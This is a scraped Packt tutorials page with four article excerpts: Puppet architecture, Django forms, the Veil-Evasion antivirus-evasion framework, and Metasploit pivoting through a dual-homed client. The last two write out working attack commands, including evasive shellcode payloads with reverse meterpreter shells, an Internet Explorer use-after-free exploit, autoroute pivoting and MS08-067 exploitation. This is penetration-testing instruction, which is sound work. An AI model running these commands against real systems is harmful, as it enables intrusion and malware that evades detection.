Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7010 Articles
article-image-designing-puppet-architectures
Packt
18 Jun 2014
21 min read
Save for later

Designing Puppet Architectures

Packt
18 Jun 2014
21 min read
(For more resources related to this topic, see here.) Puppet is an extensible automation framework, a tool, and a language. We can do great things with it, and we can do them in many different ways. Besides the technicalities of learning the basics of its DSL, one of the biggest challenges for new and not-so-new users of Puppet is to organize code and put things together in a manageable and appropriate way. It's hard to find a comprehensive documentation on how to use public code (modules) with our custom modules and data, where to place our logic, how to maintain and scale it, and generally, how to manage the resources that we want in our nodes and the data that defines them safely and effectively. There's not really a single answer that fits all these cases. There are best practices, recommendations, and many debates in the community, but ultimately, it all depends on our own needs and infrastructure, which vary according to multiple factors, such as the following: The number and variety of nodes and application stacks to manage The infrastructure design and number of data centers or separate networks to manage The number and skills of people who work with Puppet The number of teams who work with Puppet Puppet's presence and integration with other tools Policies for change in production In this article, we will outline the elements needed to design a Puppet architecture, reviewing the following elements in particular: The tasks to deal with (manage nodes, data, code, files, and so on) and the available components to manage them Foreman, which is probably the most used ENC around, with Puppet Enterprise The pattern of roles and profiles Data separation challenges and issues How the various components can be used together in different ways with some sample setups The components of Puppet architecture With Puppet, we manage our systems via the catalog that the Puppet Master compiles for each node. This is the total of the resources we have declared in our code, based on the parameters and variables whose values reflect our logic and needs. Most of the time, we also provide configuration files either as static files or via ERB templates, populated according to the variables we have set. We can identify the following major tasks when we have to manage what we want to configure on our nodes: Definition of the classes to be included in each node Definition of the parameters to use for each node Definition of the configuration files provided to the nodes These tasks can be provided by different, partly interchangeable components, which are as follows: site.pp is the first file parsed by the Puppet Master (by default, its path is /etc/puppet/manifests/site.pp) and eventually, all the files that are imported from there (import nodes/*.pp would import and parse all the code defined in the files with the .pp suffix in the /etc/puppet/manifests/nodes/ directory). Here, we have code in the Puppet language. An ENC (External Node Classifier) is an alternative source that can be used to define classes and parameters to apply to nodes. It's enabled with the following lines on the Puppet Master's puppet.conf: [master] node_terminus = exec external_nodes = /etc/puppet/node.rb What's referred by the external_nodes parameter can be any script that uses any backend; it's invoked with the client's certname as the first argument (/etc/puppet/node.rb web01.example.com) and should return a YAML formatted output that defines the classes to include for that node, the parameters, and the Puppet environment to use. Besides the well-known Puppet-specific ENCs such as The Foreman and Puppet Dashboard (a former Puppet Labs project now maintained by the community members), it's not uncommon to write new custom ones that leverage on existing tools and infrastructure-management solutions. LDAP can be used to store nodes' information (classes, environment, and variables) as an alternative to the usage of an ENC. To enable LDAP integration, add the following lines to the Master's puppet.conf: [master] node_terminus = ldap ldapserver = ldap.example.com ldapbase = ou=Hosts,dc=example,dc=com Then, we have to add Puppet's schema to our LDAP server. For more information and details, refer to http://docs.puppetlabs.com/guides/ldap_nodes.html. Hiera is the hierarchical key-value datastore. It is is embedded in Puppet 3 and available as an add-on for previous versions. Here, we can set parameters but also include classes and eventually provide content for files. Public modules can be retrieved from Puppet Forge, GitHub, or other sources; they typically manage applications and systems' settings. Being public, they might not fit all our custom needs, but they are supposed to be reusable, support different OSes, and adapt to different usage cases. We are supposed to be able to use them without any modification, as if they were public libraries, committing our fixes and enhancements back to the upstream repository. A common but less-recommended alternative is to fork a public module and adapt it to our needs. This might seem a quicker solution, but doesn't definitively help the open source ecosystem and would prevent us from having benefits from updates on the original repository. Site module(s) are custom modules with local resources and files where we can place all the logic we need or the resources we can't manage with public modules. They may be one or more and may be called site or have the name of our company, customer, or project. Site modules have particular sense as a companion to public modules when they are used without local modifications. On site modules, we can place local settings, files, custom logic, and resources. The distinction between public reusable modules and site modules is purely formal; they are both Puppet modules with a standard structure. It might make sense to place the ones we develop internally in a dedicated directory (module paths), which is different from the one where we place shared modules downloaded from public sources. Let's see how these components might fit our Puppet tasks. Defining the classes to include in each node This is typically done when we talk about node classification in Puppet. This is the task that the Puppet Master accomplishes when it receives a request from a client node and has to determine the classes and parameters to use for that specific node. Node classification can be done in the following different ways: We can use the node declaration in site.pp and other manifests eventually imported from there. In this way, we identify each node by certname and declare all the resources and classes we want for it, as shown in the following code: node 'web01.example.com' { include ::general include ::apache } Here, we may even decide to follow a nodeless layout, where we don't use the node declaration at all and rely on facts to manage the classes and parameters to be assigned to our nodes. An example of this approach is examined later in this article. On an ENC, we can define the classes (and parameters) that each node should have. The returned YAML for our simple case would be something like the following lines of code: --- classes: - general: - apache: parameters: dns_servers: - 8.8.8.8 - 8.8.4.4 smtp_server: smtp.example.com environment: production Via LDAP, where we can have a hierarchical structure where a node can inherit the classes (referenced with the puppetClass attribute) set in a parent node (parentNode). Via Hiera, using the hiera_include function just add in site.pp as follows: hiera_include('classes'). Then, define our hierarchy under the key named classes, what to include for each node. For example, with a YAML backend, our case would be represented with the following lines of code: --- classes: - general - apache In site module(s), any custom logic can be placed as, for example, the classes and resources to include for all the nodes or for specific groups of nodes. Defining the parameters to use for each node This is another crucial part, as with parameters, we can characterize our nodes and define the resources we want for them. Generally, to identify and characterize a node in order to differentiate it from the others and provide the specific resources we want for it, we need very few key parameters, such as the following (the names used here may be common but are arbitrary and are not Puppet's internal ones): role is almost a standard de facto name to identify the kind of server. A node is supposed to have just one role, which might be something like webserver, app_be, db, or anything that identifies the function of the node. Note that web servers that serve different web applications should have different roles (that is, webserver_site, webserver_blog, and so on). We can have one or more nodes with the same role. env or any name that identifies the operational environment of the node (if it is a development, test, qa, or production server). Note that this doesn't necessarily match Puppet's internal environment variable. Someone prefers to merge the env information inside role, having roles such as webserver_prod and webserver_devel. Zone, site, data center, country, or any parameter that might identify the network, country, availability zone, or datacenter where the node is placed. A node is supposed to belong to only one of this. We might not require this in our infrastructure. Tenant, component, application, project, and cluster might be the other kind of variables that characterize our node. There's not a real standard on their naming, and their usage and necessity strictly depend on the underlying infrastructure. With parameters such as these, any node can be fully identified and be served with any specific configuration. It makes sense to provide them, where possible, as facts. The parameters we use in our manifests may have a different nature: role/env/zone as defined earlier are used to identify the nodes; they typically are used to determine the values of other parameters OS-related parameters such as package names and file paths Parameters that define the services of our infrastructure (DNS servers, NTP servers, and so on) Username and passwords, which should be reserved, used to manage credentials Parameters that express any further custom logic and classifying need (master, slave, host_number, and so on) Parameters exposed by the parameterized classes or defines we use Often, the value of some parameters depend on the value of other ones. For example, the DNS or NTP server may change according to the zone or region on a node. When we start to design our Puppet architecture, it's important to have a general idea of the variations involved and the possible exceptions, as we will probably define our logic according to them. As a general rule, we will use the identifying parameters (role/env/zone) to define most of the other parameters most of the time, so we'll probably need to use them in our Hiera hierarchy or in Puppet selectors. This also means that we probably will need to set them as top scope variables (for example, via an ENC) or facts. As with the classes that have to be included, parameters may be set by various components; some of them are actually the same, as in Puppet, a node's classification involves both classes to include and parameters to apply. These components are: In site.pp, we can set variables. If they are outside nodes' definitions, they are at top scope; if they are inside, they are at node scope. Top scope variables should be referenced with a :: prefix, for example, $::role. Node scope variables are available inside the node's classes with their plain name, for example, $role. An ENC returns parameters, treated as top scope variables, alongside classes, and the logic of how they can be set depends entirely on its structure. Popular ENCs such as The Foreman, Puppet Dashboard, and the Puppet Enterprise Console allow users to set variables for single nodes or for groups, often in a hierarchical fashion. The kind and amount of parameters set here depend on how much information we want to manage on the ENC and how much to manage somewhere else. LDAP, when used as a node's classifier, returns variables for each node as defined with the puppetVar attribute. They are all set at top scope. In Hiera, we set keys that we can map to Puppet variables with the hiera(), hiera_array() and hiera_hash() functions inside our Puppet code. Puppet 3's data bindings automatically map class' parameters to Hiera keys, so for these cases, we don't have to explicitly use hiera* functions. The defined hierarchy determines how the keys' values change according to the values of other variables. On Hiera, ideally, we should place variables related to our infrastructure and credentials but not OS-related variables (they should stay in modules if we want them to be reusable). A lot of documentation about Hiera shows sample hierarchies with facts such as osfamily and operatingsystem. In my very personal opinion, such variables should not stay there (weighting the hierarchy size), as OS differences should be managed in the classes and modules used and not in Hiera. On public shared modules, we typically deal with OS-specific parameters. Modules should be considered as reusable components that know all about how to manage an application on different OS but nothing about custom logic. They should expose parameters and defines that allow users to determine their behavior and fit their own needs. On site module(s), we may place infrastructural parameters, credentials, and any custom logic, more or less based on other variables. Finally, it's possible and generally recommended to create custom facts that identify the node directly from the agent. An example of this approach is a totally facts-driven infrastructure, where all the node-identifying variables, upon which all the other parameters are defined, are set as facts. Defining the configuration files provided to the nodes It's almost certain that we will need to manage configuration files with Puppet and that we need to store them somewhere, either as plain static files to serve via Puppet's fileserver functionality using the source argument of the File type or via .erb templates. While it's possible to configure custom fileserver shares for static files and absolute paths for templates, it's definitively recommended to rely on the modules' autoloading conventions and place such files inside custom or public modules, unless we decide to use Hiera for them. Configuration files, therefore, are typically placed in: Public modules: These may provide default templates that use variables exposed as parameters by the modules' classes and defines. As users, we don't directly manage the module's template but the variables used inside it. A good and reusable module should allow us to override the default template with a custom one. In this case, our custom template should be placed in a site module. If we've forked a public shared module and maintain a custom version we might be tempted to place there all our custom files and templates. Doing so, we lose in reusability and gain, maybe, in short term usage simplicity. Site module(s): These are, instead, a more correct place for custom files and templates, if we want to maintain a setup based on public shared modules, which are not forked, and custom site ones where all our stuff stays confined in a single or few modules. This allows us to recreate similar setups just by copying and modifying our site modules, as all our logic, files and resources are concentrated there. Hiera: Thanks to the smart hiera-file backend, Hiera can be an interesting alternative place where to store configuration files, both static ones or templates. We can benefit of the hierarchy logic that works for us and can manage any kind of file without touching modules. Custom fileserver mounts can be used to serve any kind of static files from any directory of the Puppet Master. They can be useful if we need to provide via Puppet files generated/managed by third-party scripts or tools. An entry in /etc/puppet/fileserver.conf like: [data] path /etc/puppet/static_files allow *.example.com Allows serving a file like /etc/puppet/static_files/generated/file.txt with the argument: source => 'puppet:///data/generated/file.txt', Defining custom resources and classes We'll probably need to provide custom resources, which are not declared in the shared modules, to our nodes, because these resources are too specific. We'll probably want to create some grouping classes, for example, to manage the common baseline of resources and classes we want applied to all our nodes. This is typically a bunch of custom code and logic that we have to place somewhere. The usual locations are as follows: Shared modules: These are forked and modified to including custom resources; as already outlined, this approach doesn't pay in the long term. Site module(s): These are preferred place-to-place custom stuff, included some classes where we can manage common baselines, role classes, and other containers' classes. Hiera, partially, if we are fond of the create_resources function fed by hashes provided in Hiera. In this case, somewhere (in a site or shared module or maybe, even in site.pp), we have to place the create_resources statements. The Foreman The Foreman is definitively the biggest open source software product related to Puppet and not directly developed by Puppet Labs. The project was started by Ohad Levy, who now works at Red Hat and leads its development, supported by a great team of internal employees and community members. The Foreman can work as a Puppet ENC and reporting tool; it presents an alternative to the Inventory System, and most of all, it can manage the whole lifecycle of the system, from provisioning to configuration and decommissioning. Some of its features have been quite ahead of their times. For example, the foreman() function made possible for a long time what is done now with the puppetdbquery module. It allows direct query of all the data gathered by The Foreman: facts, nodes classification, and Puppet-run reports. Let's look at this example that assigns to the $web_servers variable the list of hosts that belong to the web hostgroup, which have reported successfully in the last hour: $web_servers = foreman("hosts", "hostgroup ~ web and status.failed = 0 and last_report < "1 hour ago"") This was possible long before PuppetDB was even conceived. The Foreman really deserves at least a book by itself, so here, we will just summarize its features and explore how it can fit in a Puppet architecture. We can decide which components to use: Systems provisioning and life-cycle management Nodes IP addressing and naming The Puppet ENC function based on a complete web interface Management of client certificates on the Puppet Master The Puppet reporting function with a powerful query interface The Facts querying function, equivalent to the Puppet Inventory system For some of these features, we may need to install Foreman's Smart Proxies on some infrastructural servers. The proxies are registered on the central Foreman server and provide a way to remotely control relevant services (DHCP, PXE, DNS, Puppet Master, and so on). The Web GUI based on Rails is quite complete and appealing, but it might prove cumbersome when we have to deal with a large number of nodes. For this reason, we can also manage Foreman via the CLI. The original foreman-cli command has been around for years but is now deprecated for the new hammer (https://github.com/theforeman/hammer-cli) with the Foreman plugin, which is very versatile and powerful as it allows us to manage, via the command line, most of what we can do on the web interface. Roles and profiles In 2012, Craig Dunn wrote a blog post (http://www.craigdunn.org/2012/05/239/) that quickly became a point of reference on how to organize Puppet code. He discussed his concept of roles and profiles. The role describes what the server represents, a live web server, a development web server, a mail server, and so on. Each node can have one and only one role. Note that in his post, he manages environments inside roles (two web servers on two different environments have two different roles): node www1 { include ::role::www::dev } node www2 { include ::role::www::live } node smtp1 { include ::role::mailserver } Then, he introduces the concept of profiles, which include and manage modules to define a logical technical stack. A role can include one or more profiles: class role { include profile::base } class role::www inherits role { include ::profile::tomcat } In environment-related subroles, we can manage the exceptions we need (here, for example, the www::dev role includes both the database and webserver::dev profiles): class role::www::dev inherits role::www { include ::profile::webserver::dev include ::profile::database } class role::www::live inherits role::www { include ::profile::webserver::live } Usage of class inheritance here is not mandatory, but it is useful to minimize code duplication. This model expects modules to be the only components where resources are actually defined and managed; they are supposed to be reusable (we use them without modifying them) and manage only the components they are written for. In profiles, we can manage resources and the ordering of classes; we can initialize variables and use them as values for arguments in the declared classes, and we can generally benefit from having an extra layer of abstraction: Class profile::base { include ::networking include ::users } class profile::tomcat { class { '::jdk': } class { '::tomcat': } } class profile::webserver { class { '::httpd': } class { '::php': } class { '::memcache': } } In profiles subclasses, we can manage exceptions or particular cases: class profile::webserver::dev inherits profile::webserver { Class['::php'] { loglevel => "debug" } } This model is quite flexible and has gained a lot of attention and endorsement from Puppet Labs. It's not the only approach that we can follow to organize the resources we need for our nodes in a sane way, but it's the current best practice and a good point of reference, as it formalizes the concept of role and exposes how we can organize and add layers of abstraction between our nodes and the used modules. The data and the code Hiera's crusade and possibly main reason to exist is data separation. In practical terms, this means to convert Puppet code like the following one: $dns_server = $zone ? { 'it' => '1.2.3.4', default => '8.8.8.8', } class { '::resolver': server => $dns_servers, } Into something where there's no trace of local settings like: $dns_server = hiera('dns_server') class { '::resolver': server => $dns_servers, } With Puppet 3, the preceding code can be even more simplified with just the following line: include ::resolver This expects the resolver::server key evaluated as needed in our Hiera data sources. The advantages of having data (in this case, the IP of the DNS server, whatever is the logic to elaborate it) in a separated place are clear: We can manage and modify data without changing our code Different people can work on data and code Hiera's pluggable backend system dramatically enhances how and where data can be managed, allowing seamless integration with third-party tools and data sources Code layout is simpler and more error proof The lookup hierarchy is configurable Nevertheless, there are a few little drawbacks or maybe, just the necessary side effects or needed evolutionary steps. They are as follows: What we've learned about Puppet and used to do without Hiera is obsolete We don't see, directly in our code, the values we are using We have two different places where we can look to understand what code does We need to set the variables we use in our hierarchy as top scope variables or facts, or anyway, we need to refer to them with a fixed fully qualified name We might have to refactor a lot of existing code to move our data and logic into Hiera A personal note: I've been quite a late jumper on the Hiera wagon. While developing modules with the ambition that they can be reusable, I decided I couldn't exclude users who weren't using this additional component. So, until Puppet 3 with Hiera integrated in it became mainstream, I didn't want to force the usage of Hiera in my code. Now things are different. Puppet 3's data bindings change the whole scene, Hiera is deeply integrated and is here to stay, and so, even if we can happily live without using it, I would definitively recommend its usage in most of the cases.
Read more
  • 0
  • 0
  • 2372

article-image-adding-developer-django-forms
Packt
18 Jun 2014
8 min read
Save for later

Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
(For more resources related to this topic, see here.) When displaying the form, it will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. While receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct. CSRF protection Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or access to sensitive data. The following steps are executed during a CSRF attack: Script injection by the attacker. An HTTP query is performed to get a web page. Downloading the web page that contains the malicious script. Malicious script execution. In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site from this kind of attack, and Django will help with this. To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line: 'django.middleware.csrf.CsrfViewMiddleware', This protection ensures that the data that has been sent is really sent from a specific property page. You can check this in two easy steps: When creating an HTML or Django form, we insert a CSRF token that will store the server. When the form is sent, the CSRF token will be sent too. When the server receives the request from the client, it will check the CSRF token. If it is valid, it validates the request. Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token. For the previous form to work with CSRF protection, we need to add the following line in the form of tags and <form> </form>: {% csrf_token %} The view with a Django form We will first write the view that contains the form because the template will display the form defined in the view. Django forms can be stored in other files as forms.py at the root of the project file. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines: from django.shortcuts import render from django.http import HttpResponse from TasksManager.models import Supervisor, Developer from django import forms # This line imports the Django forms package class Form_inscription(forms.Form): # This line creates the form with four fields. It is an object that inherits from forms.Form. It contains attributes that define the form fields. name = forms.CharField(label="Name", max_length=30) login = forms.CharField(label="Login", max_length=30) password = forms.CharField(label="Password", widget=forms.PasswordInput) supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all()) # View for create_developer def page(request): if request.POST: form = Form_inscription(request.POST) # If the form has been posted, we create the variable that will contain our form filled with data sent by POST form. if form.is_valid(): # This line checks that the data sent by the user is consistent with the field that has been defined in the form. name = form.cleaned_data['name'] # This line is used to retrieve the value sent by the client. The collected data is filtered by the clean() method that we will see later. This way to recover data provides secure data. login = form.cleaned_data['login'] password = form.cleaned_data['password'] supervisor = form.cleaned_data['supervisor'] # In this line, the supervisor variable is of the Supervisor type, that is to say that the returned data by the cleaned_data dictionary will directly be a model. new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor) new_developer.save() return HttpResponse("Developer added") else: return render(request, 'en/public/create_developer.html', {'form' : form}) # To send forms to the template, just send it like any other variable. We send it in case the form is not valid in order to display user errors: else: form = Form_inscription() # In this case, the user does not yet display the form, it instantiates with no data inside. return render(request, 'en/public/create_developer.html', {'form' : form}) This screenshot shows the display of the form with the display of an error message: Template of a Django form We set the template for this view. The template will be much shorter: {% extends "base.html" %} {% block title_html %} Create Developer {% endblock %} {% block h1 %} Create Developer {% endblock %} {% block article_content %} <form method="post" action="{% url "create_developer" %}" > {% csrf_token %} <!-- This line inserts a CSRF token. --> <table> {{ form.as_table }} <!-- This line displays lines of the form.--> </table> <p><input type="submit" value="Create" /></p> </form> {% endblock %} As the complete form operation is in the view, the template simply executes the as_table() method to generate the HTML form. The previous code displays data in tabular form. The three methods to generate an HTML form structure are as follows: as_table: This displays fields in the <tr> <td> tags as_ul: This displays the form fields in the <li> tags as_p: This displays the form fields in the <p> tags So, we quickly wrote a secure form with error handling and CSRF protection through Django forms. The form based on a model ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database to a non-MVC website. These particular forms have a save() method that will save the form data in a new record. The supervisor creation form To broach ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page. For this, we will create the following URL: url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"), Our view will contain the following code: from django.shortcuts import render from TasksManager.models import Supervisor from django import forms from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse def page(request): if len(request.POST) > 0: form = Form_supervisor(request.POST) if form.is_valid(): form.save(commit=True) # If the form is valid, we store the data in a model record in the form. return HttpResponseRedirect(reverse('public_index')) # This line is used to redirect to the specified URL. We use the reverse() function to get the URL from its name defines urls.py. else: return render(request, 'en/public/create_supervisor.html', {'form': form}) else: form = Form_supervisor() return render(request, 'en/public/create_supervisor.html', {'form': form}) class Form_supervisor(forms.ModelForm): # Here we create a class that inherits from ModelForm. class Meta: # We extend the Meta class of the ModelForm. It is this class that will allow us to define the properties of ModelForm. model = Supervisor # We define the model that should be based on the form. exclude = ('date_created', 'last_connexion', ) # We exclude certain fields of this form. It would also have been possible to do the opposite. That is to say with the fields property, we have defined the desired fields in the form. As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly. Indeed, these properties receive a tuple of the fields to exclude or include as arguments. They can be described as follows: exclude: This is used in the case of an accessible form by the administrator. Because, if you add a field in the model, it will be included in the form. fields: This is used in cases in which the form is accessible to users. Indeed, if we add a field in the model, it will not be visible to the user. For example, we have a website selling royalty-free images with a registration form based on ModelForm. The administrator adds a credit field in the extended model of the user. If the developer has used an exclude property in some of the fields and did not add credits, the user will be able to take as many credits as he/she wants. We will resume our previous template, where we will change the URL present in the attribute action of the <form> tag: {% url "create_supervisor" %} This example shows us that ModelForms can save a lot of time in development by having a form that can be customized (by modifying the validation, for example). Summary This article discusses Django forms. It explains how to create forms with Django and how to treat them. Resources for Article: Further resources on this subject: So, what is Django? [article] Creating an Administration Interface in Django [article] Django Debugging Overview [article]
Read more
  • 0
  • 0
  • 2091

article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 10855

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 6420

article-image-signal-processing-techniques
Packt
